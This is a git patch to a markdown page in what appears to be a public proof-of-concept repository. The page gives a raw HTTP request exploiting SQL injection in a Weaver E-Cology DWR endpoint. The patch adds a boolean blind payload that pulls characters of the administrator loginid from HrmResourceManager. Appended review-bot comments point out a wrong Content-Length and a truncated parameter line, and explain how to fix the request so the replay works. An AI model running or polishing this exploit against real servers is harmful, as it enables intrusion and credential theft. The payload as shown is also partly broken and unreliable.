From faa904f1f15c409717cbd1509ae4b572a5148e44 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 8 Dec 2023 22:40:37 +0800
Subject: [PATCH] =?UTF-8?q?Update=20=E6=9F=90=E5=BE=AE=20E-Cology=20?=
 =?UTF-8?q?=E6=9F=90=E7=89=88=E6=9C=AC=20SQL=E6=B3=A8=E5=85=A5=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 某微 E-Cology 某版本 SQL注入漏洞.md | 19 ++++++++++---------
 1 file changed, 10 insertions(+), 9 deletions(-)

diff --git a/某微 E-Cology 某版本 SQL注入漏洞.md b/某微 E-Cology 某版本 SQL注入漏洞.md
index fbf04f5..bfc7cdb 100644
--- a/某微 E-Cology 某版本 SQL注入漏洞.md
+++ b/某微 E-Cology 某版本 SQL注入漏洞.md
@@ -1,13 +1,13 @@
 ## 某微 E-Cology 某版本 SQL注入漏洞
 ```
-POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
-Host: ip:port
+POST /dwr/call/plaincall/DocDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
+Host: ip
 User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
-Connection: close
-Content-Length: 189
-Content-Type: text/plain
+Content-Length: 191
 Accept-Encoding: gzip
-
+Connection: close
+Content-Type: text/plain
+
 callCount=1
 page=
 httpSessionId=
@@ -15,8 +15,9 @@ scriptSessionId=
 c0-scriptName=DocDwrUtil
 c0-methodName=ifNewsCheckOutByCurrentUser
 c0-id=0
-c0-param0=string:1 AND 1=1
-c0-param1=string:1
-batchId=0
+c0-param0=string:1 and ascii((select substring(loginid,1,1)from HrmResourceManager))=115
+c0-param1=strin
 ```
+![3a380d7bbc888fb3314bb6b512b4e7db](https://github.com/wy876/POC/assets/139549762/6d40d284-0894-4c18-89dc-5a978d4f5c79)
+
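Review bot: The new `Content-Length: 191` in the first hunk is shorter than the body the same patch now documents — the lines from `callCount=1` through `c0-param1=strin` add up to over 200 bytes even with bare LF line endings, and more with CRLF — so a verbatim replay will be cut off inside the `c0-param0` line before the injected predicate. A proxy that recomputes the header hides this, but a reader sending the request by hand will get a broken or hanging request. Either recompute the value for the final body or drop the header from the write-up and state that it must be computed by the sender. The `Host: ip` change is fine but the old `ip:port` form was the more useful placeholder for non-default ports.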
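Review bot: `c0-param1=strin` in the second hunk looks truncated — the line it replaces was `c0-param1=string:1`, and DWR plaincall parameters are written as `type:value`, so a value with no type prefix will most likely be rejected by the DWR layer before the vulnerable method is ever reached. The same hunk also drops `batchId=0`, which DWR's batch parser appears to expect in the request body; I would restore both lines as `c0-param1=string:1` and `batchId=0`. The payload itself is a boolean-based blind probe (`ascii(substring(loginid,1,1))=115` tests whether the first character of `loginid` in `HrmResourceManager` is `s`), so the page should state which response distinguishes a true from a false condition rather than leaving readers to infer it from the screenshot. Stating the affected version range instead of "某版本" would also make the entry usable for detection and patch-verification work.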